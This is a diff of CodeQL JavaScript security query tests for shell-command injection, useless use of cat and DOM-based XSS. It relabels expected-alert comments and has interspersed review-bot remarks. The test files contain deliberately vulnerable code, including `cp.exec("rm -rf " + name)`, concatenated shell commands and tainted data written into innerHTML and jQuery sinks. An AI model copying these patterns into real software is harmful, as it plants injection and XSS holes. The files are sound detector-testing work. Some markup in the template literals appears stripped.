+++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js index 9654b26dec03..d5230dab17f5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js @@ -7,21 +7,21 @@ var spawnSync = child_process.spawnSync; var fs = require('fs'); var app = express(); -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat /proc/" + id + "/status", function (err, out) { // NOT OK +exec("cat /proc/" + id + "/status", function (err, out) { // $ Alert console.log(out); }); -execSync('cat /proc/cpuinfo').toString(); // NOT OK. +execSync('cat /proc/cpuinfo').toString(); // $ Alert -execSync(`cat ${newpath}`) // NOT OK +execSync(`cat ${newpath}`) // $ Alert execSync('cat package.json | wc -l'); // OK - pipes! -execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK multiple files. +execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK - multiple files. -execSync(`cat ${newpath} /foo/bar`).toString(); // OK multiple files. +execSync(`cat ${newpath} /foo/bar`).toString(); // OK - multiple files. exec(`cat ${newpath} | grep foo`, function (err, out) { }) // OK - pipes 
@@ -29,73 +29,73 @@ execSync(`cat ${newpath}`, {uid: 1000}) // OK - non trivial options exec('cat *.js | wc -l', { cwd: './' }, function (err, out) { }); // OK - wildcard and pipes -execSync(`cat foo/bar/${newpath}`); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK (fs.readFileSync cannot emulate uid / gid)) +execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK - (fs.readFileSync cannot emulate uid / gid)) -execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); // OK. +execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); -execSync(`cat ${newpath} > ${destpath}`).toString(); // OK. 
+execSync(`cat ${newpath} > ${destpath}`).toString(); -execSync(`cat ${files.join(' ')} > ${outFile}`); // OK +execSync(`cat ${files.join(' ')} > ${outFile}`); -execSync(`cat ${files.join(' ')}`); // OK - but flagged - not just a simple file read [INCONSISTENCY] +execSync(`cat ${files.join(' ')}`); // $ SPURIOUS: Alert - - but flagged - not just a simple file read exec("cat /proc/cpuinfo | grep name"); // OK - pipes execSync(`cat ${newpath} | ${othertool}`); // OK - pipes function cat(file) { - return execSync('cat ' + file).toString(); // NOT OK + return execSync('cat ' + file).toString(); // $ Alert } -execSync("sh -c 'cat " + newpath + "'"); // NOT OK - but not flagged [INCONSISTENCY] +execSync("sh -c 'cat " + newpath + "'"); // $ MISSING: Alert var execFile = child_process.execFile; var execFileSync = child_process.execFileSync; -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK. - stderr is used. +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK - - stderr is used. 
console.log(stderr); }); -execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ]); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ]); // $ Alert var opts = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], opts); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], opts); // $ Alert var anOptsFileNameThatIsTooLongToBePrintedByToString = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // $ Alert -execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // $ Alert -execSync('cat /proc/cpuinfo' + foo).toString(); // NOT OK. 
+execSync('cat /proc/cpuinfo' + foo).toString(); // $ Alert -execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // NOT OK +execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // $ Alert execFileSync('node', [ `foo/bar/${newpath}` ]); // OK - not a call to cat -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -exec("cat foo/bar", (err, out) => doSomethingWith(out)); // NOT OK +exec("cat foo/bar", (err, out) => doSomethingWith(out)); // $ Alert execFileSync('/bin/cat', [ 'pom.xml' ], unknownOptions); // OK - unknown options. @@ -118,13 +118,13 @@ spawn('cat', { stdio: ['pipe', stdin, 'inherit'] }); // OK - Non trivial use. (B cat.stdout.on('end', () => res.end()); })(); -var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); // OK +var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); console.log(notDead); (function () { - var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK + var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert someCall( exec("cat foo/bar", (err, out) => {console.log(out)}) // OK - non-trivial use of returned proccess. 
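Review bot: Three comments in this hunk still carry leftovers of the mechanical rewrite: `// $ SPURIOUS: Alert - - but flagged - not just a simple file read`, `// OK - - stderr is used.` and `// OK - (fs.readFileSync cannot emulate uid / gid))` with its unbalanced parenthesis. They would read better as `// $ SPURIOUS: Alert - not just a simple file read`, `// OK - stderr is used.` and `// OK - fs.readFileSync cannot emulate uid / gid`. The trailing text is presumably ignored by the expectation checker, so this affects readability only. It matters most on the `SPURIOUS` line, where the reason for the known false positive should be easy to read.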
@@ -133,34 +133,34 @@ console.log(notDead); return exec("cat foo/bar", (err, out) => {console.log(out)}); // OK - non-trivial use of returned proccess. })(); -const stdout2 = execSync('cat /etc/dnsmasq.conf', { // NOT OK. +const stdout2 = execSync('cat /etc/dnsmasq.conf', { // $ Alert encoding: 'utf8' }); -exec('/bin/cat', function (e, s) {}); // OK +exec('/bin/cat', function (e, s) {}); -spawn("cat") // OK +spawn("cat") var shelljs = require("shelljs"); -shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert let cspawn = require('cross-spawn'); -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar']); // NOT OK -cspawn('cat', (err, out) => {console.log(out)}); // OK -cspawn('cat', { encoding: 'utf8' }); // OK +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar']); // $ Alert +cspawn('cat', (err, out) => {console.log(out)}); +cspawn('cat', { encoding: 'utf8' }); -let myResult = cspawn.sync('cat', ['foo/bar']); // NOT OK -let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK +let myResult = cspawn.sync('cat', ['foo/bar']); // $ Alert +let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert var execmod = require('exec'); 
-execmod("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +execmod("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 97d21371d082..8d4a8cac6d0a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,16 +1,16 @@ this.addEventListener('message', function(event) { - document.write(event.data); // NOT OK + document.write(event.data); // $ Alert }) this.addEventListener('message', function({data}) { - document.write(data); // NOT OK + document.write(data); // $ Alert }) function test() { function foo(x, event, y) { - document.write(x.data); // OK - document.write(event.data); // NOT OK - document.write(y.data); // OK + document.write(x.data); + document.write(event.data); // $ Alert + document.write(y.data); } window.addEventListener("message", foo.bind(null, {data: 'items'})); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 37d3388ee784..1b186b7db6a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js 
@@ -1,12 +1,12 @@ angular.module('myApp', []) .directive('myCustomer', function() { return { - templateUrl: "SAFE" // OK + templateUrl: "SAFE" } }) .directive('myCustomer', function() { return { - templateUrl: Cookie.get("unsafe") // NOT OK + templateUrl: Cookie.get("unsafe") // $ Alert } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts index 6d1823c2f601..66cde9439328 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts 
@@ -21,29 +21,29 @@ export class AppComponent implements OnInit { ) {} ngOnInit() { - this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // $ Alert this.route.paramMap.subscribe(map => { - this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // $ Alert }); - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // NOT OK - though depends on route config - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // $ Alert - though depends on route config + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // $ Alert + 
this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.router.url); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.router.url); // $ Alert - this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // NOT OK - this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // NOT OK + this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // $ Alert + this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // $ Alert } someMethod(routeSnapshot: ActivatedRouteSnapshot) { - this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index a0e75045a2eb..8cda29a4e952 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js 
@@ -4,15 +4,15 @@ import classNamesB from 'classnames/bind'; import clsx from 'clsx'; function main() { - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert let unsafeStyle = classNames.bind({foo: window.name}); - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; + document.body.innerHTML = `Hello`; // $ Alert - document.body.innerHTML += `Hello`; // NOT OK + document.body.innerHTML += `Hello`; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index b87d5a43beea..161a1d6bdd82 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts @@ -12,7 +12,7 @@ function paste(e) { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } 
@@ -21,16 +21,16 @@ function paste(e) { export function install(el: HTMLElement): void { el.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }) } document.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }); $("#foo").bind('paste', (e) => { - $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // $ Alert }); (function () { @@ -47,7 +47,7 @@ $("#foo").bind('paste', (e) => { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -96,6 +96,6 @@ async function getClipboardData(e: ClipboardEvent): Promise if (!dataTransfer) return; const html = dataTransfer.getData('text/html'); - $("#id").html(html); // NOT OK + $("#id").html(html); // $ Alert }); })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js index 9177f08bdc5c..dfa55453917a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js @@ -2,6 +2,6 @@ import * as dummy from 'dummy'; class CustomElm extends HTMLElement { test() { - this.innerHTML = window.name; // NOT OK + this.innerHTML = window.name; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index 1bb64b48b214..c84f169995cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -8,15 +8,15 @@ function doSomething() { d3.select('#main') .attr('width', 100) .style('color', 'red') - .html(getTaint()) // NOT OK - .html(d => getTaint()) // NOT OK + .html(getTaint()) // $ Alert + .html(d => getTaint()) // $ Alert .call(otherFunction) - .html(d => getTaint()); // NOT OK + .html(d => getTaint()); // $ Alert } function otherFunction(selection) { selection .attr('foo', 'bar') - .html(getTaint()); // NOT OK + .html(getTaint()); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 47513c796d96..97363f790da1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js 
@@ -8,17 +8,17 @@ function main() { let time = new Date(); let taint = decodeURIComponent(window.location.hash.substring(1)); - document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // $ Alert document.body.innerHTML = `Time is ${dateFns.format(taint, time)}`; // OK - time arg is safe document.body.innerHTML = `Time is ${dateFnsFp.format(time)(taint)}`; // OK - time arg is safe - document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment(taint).format()}`; // OK - document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment(taint).format()}`; + document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // $ Alert import dayjs from 'dayjs'; - document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // $ Alert } import LuxonAdapter from "@date-io/luxon"; 
@@ -34,10 +34,10 @@ function dateio() { const moment = new MomentAdapter(); const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // $ Alert } import { DateTime } from "luxon"; 
@@ -45,18 +45,18 @@ import { DateTime } from "luxon"; function luxon() { let taint = decodeURIComponent(window.location.hash.substring(1)); - document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // $ Alert } function dateio2() { let taint = decodeURIComponent(window.location.hash.substring(1)); const moment = new MomentAdapter(); - document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert const luxon = new LuxonAdapter(); - document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // $ Alert const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 487e51c8f8ad..1d43afdefa91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts 
@@ -12,7 +12,7 @@ function drop(e) { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -21,16 +21,16 @@ function drop(e) { export function install(el: HTMLElement): void { el.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }) } document.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }); $("#foo").bind('drop', (e) => { - $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // $ Alert }); (function () { @@ -47,7 +47,7 @@ $("#foo").bind('drop', (e) => { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js index a48f720bed1a..152a986bbf6e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js @@ -1,4 +1,4 @@ function test() { let loc = window.location.href; - $('click'); // OK + $('click'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js index 5b79cfce8993..8eebe40b4179 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js 
@@ -1,3 +1,3 @@ document.getElementById('my-id').onclick = function() { - this.parentNode.innerHTML = '

    A link

    '; // NOT OK + this.parentNode.innerHTML = '

    A link

    '; // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js index cab534d3832c..2d1af9065d35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js @@ -3,9 +3,8 @@ var app = express(); import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - // NOT OK - new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); + new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); // $ Alert + - // OK new JSDOM(req.param("wobble"), { runScripts: "outside-only" }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index 3369df5dd873..f81f545809fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -2,37 +2,37 @@ function test() { var tainted = document.location.search $(tainted); // OK - location.search starts with '?' - $("body", tainted); // OK - $("." + tainted); // OK - $("
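Review bot: In express.js the safe `runScripts: "outside-only"` call loses its standalone `// OK` line and an empty added line takes its place, so the file no longer says why this `JSDOM` sink is expected to stay unflagged. I would drop the empty line and keep a short reason on the call, e.g. `new JSDOM(req.param("wobble"), { runScripts: "outside-only" }); // OK - scripts in the parsed markup are not executed`. The same comment-replaced-by-blank-line pattern shows up in translate.js (before the `translated-term` line) and in `tst()` in tst.js, where each sanitising `if` body now seems to open with an empty line before `document.write(v)`. Whitespace is collapsed on this page, so whether those added lines are empty or whitespace-only cannot be seen here.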
    "); // NOT OK - $("body").html("XSS: " + tainted); // NOT OK + $("body", tainted); + $("." + tainted); + $("
    "); // $ Alert + $("body").html("XSS: " + tainted); // $ Alert $(window.location.hash); // OK - location.hash starts with '#' - $("" + location.toString() + ""); // NOT OK + $("" + location.toString() + ""); // $ Alert // Not related to jQuery, but the handling of $() should not affect this sink let elm = document.getElementById('x'); - elm.innerHTML = decodeURIComponent(window.location.hash); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.search); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.toString()); // NOT OK + elm.innerHTML = decodeURIComponent(window.location.hash); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert let hash = window.location.hash; $(hash); // OK - start with '#' - $(hash.substring(1)); // NOT OK - $(hash.substring(1, 10)); // NOT OK - $(hash.substr(1)); // NOT OK - $(hash.slice(1)); // NOT OK - $(hash.substring(0, 10)); // OK + $(hash.substring(1)); // $ Alert + $(hash.substring(1, 10)); // $ Alert + $(hash.substr(1)); // $ Alert + $(hash.slice(1)); // $ Alert + $(hash.substring(0, 10)); - $(hash.replace('#', '')); // NOT OK - $(window.location.search.replace('?', '')); // NOT OK - $(hash.replace('!', '')); // OK - $(hash.replace('blah', '')); // OK + $(hash.replace('#', '')); // $ Alert + $(window.location.search.replace('?', '')); // $ Alert + $(hash.replace('!', '')); + $(hash.replace('blah', '')); - $(hash + 'blah'); // OK + $(hash + 'blah'); $('blah' + hash); // OK - does not start with '<' - $('' + hash + ''); // NOT OK + $('' + hash + ''); // $ Alert - $('#foo').replaceWith(tainted); // NOT OK - $('#foo').replaceWith(() => tainted); // NOT OK + $('#foo').replaceWith(tainted); // $ Alert + $('#foo').replaceWith(() => tainted); // $ Alert } 
